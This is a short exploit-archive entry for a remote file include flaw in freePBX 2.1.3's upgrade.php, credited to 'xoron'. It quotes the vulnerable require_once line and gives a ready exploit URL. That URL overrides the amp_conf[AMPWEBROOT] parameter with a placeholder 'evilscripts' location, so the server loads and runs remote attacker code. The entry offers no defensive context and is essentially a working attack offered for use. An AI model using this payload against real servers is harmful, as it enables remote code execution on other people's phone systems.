id: 1076
date: 10/27/2006
title: freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
author: xoron
cves: 

=============================================================
freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
=============================================================



Script: freePBX
Version: v2.1.3
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide



#  0day.today [2023-03-26]  #